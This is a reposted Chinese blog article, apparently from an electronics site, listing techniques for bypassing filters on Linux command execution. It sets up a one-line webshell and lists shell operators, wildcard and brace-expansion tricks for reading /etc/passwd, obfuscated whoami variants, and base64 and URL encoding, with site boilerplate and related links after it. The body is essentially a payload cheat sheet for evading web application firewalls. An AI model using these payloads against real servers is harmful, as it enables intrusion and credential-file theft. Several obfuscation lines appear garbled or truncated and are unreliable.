0x00写在前面
本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
0x01实践演示
部署服务器端为Linux系统的http服务,留存get和post方式的一句话木马,用于命令执行测试。(测试思路可以对话Chatgpt)
linux逻辑运算符
; //分号
| //仅执行后面那条命令
|| //仅执行前面那条命令
& //两条命令都会执行
&& //两条命令都会执行(注意url编码)
%0a //换行符 %0d //回车符
利用通配符
通配符"?"代表任意一个字符,"*"代表任意个字符
cat%20/etc/pa??wd
cat%20/etc/pa?*wd
尝试
cat /*****et*c*/*pas**************************************************swd
结合上述方式进行组合bypass
echo mt ; whoami
使用大括号来绕过空格的限制
{cat,/etc/passwd}
{ls,-alth}
命令混淆
whoami
1oami
@ami *mi
命令变形
/*/bin/wh*mi
/us*/*in/who*mi
/*s?/*?n/w?o*i
base64编码方式进行
echo id|base64
echo id|base64
URL编码
%28%22%65%5c%63%68%6f%20%5c%69%5c%64%7c%62%61%73%65%36%34%22%29%3b
审核编辑 :李倩
声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容侵权或者其他违规问题,请联系本站处理。
举报投诉
-
Linux
+关注
关注
87文章
11298浏览量
209382 -
服务器
+关注
关注
12文章
9138浏览量
85366 -
逻辑运算
+关注
关注
0文章
56浏览量
9761
原文标题:Linux命令执行Bypass常见姿势
文章出处:【微信号:哆啦安全,微信公众号:哆啦安全】欢迎添加关注!文章转载请注明出处。
发布评论请先 登录
相关推荐
嵌入式Linux开发教程:Linux常见命令(上篇)
摘要:这是对周立功编著的《嵌入式Linux开发教程》的第7期连载。本期刊载内容有关LinuxLinux常见命令中的导航命令、目录命令和文件
发表于 10-21 13:36
•11次下载
linux技术:WAF运行命令执行方法
如果命令执行的时候遇到拦截命令关键词的时候可以利用如下方法绕过: "和^是CMD命令中最常见的转义字符,还有成对的括号并不会影响
发表于 11-07 20:27
•991次阅读
linux命令和shell编程有什么联系
Linux命令和Shell编程之间存在密切的联系。 首先,Shell是Linux命令行下的解释器,它提供了一个用户界面,使用户能够与Linux
linux中source命令的用法
在Linux中,source命令通常用于重新执行刚修改的初始化文件,使之立即生效,而不必注销并重新登录。source命令可以用于读取并执行脚
linux重启命令有哪些
Linux是一种自由和开放源代码的操作系统,被广泛应用于服务器和嵌入式设备。在Linux中,有多种命令用于重启系统。在本文中,我们将详细介绍常用的Linux重启
总结linux命令行的主要用法
Linux命令行是一种在Linux操作系统中通过文本界面来执行指令和管理系统的方式。它提供了丰富的功能和灵活性,帮助用户完成各种任务。本文将详细介绍
uboot命令的执行过程是什么
U-boot是通过执行u-boot提供的命令来加载Linux内核的,其中 命令bootm的功能 即为从memory启动Linux内核映像文件
bypass电容多大 bypass电容怎么计算
Bypass电容的大小和计算方法 Bypass电容是一种常见的电子元件,用于绕过或降低电路中的噪声、干扰或漏磁磁通。它能够有效地将高频噪声或漏磁磁通通过一个低阻抗路径绕过,从而保持电路的稳定性和信号
评论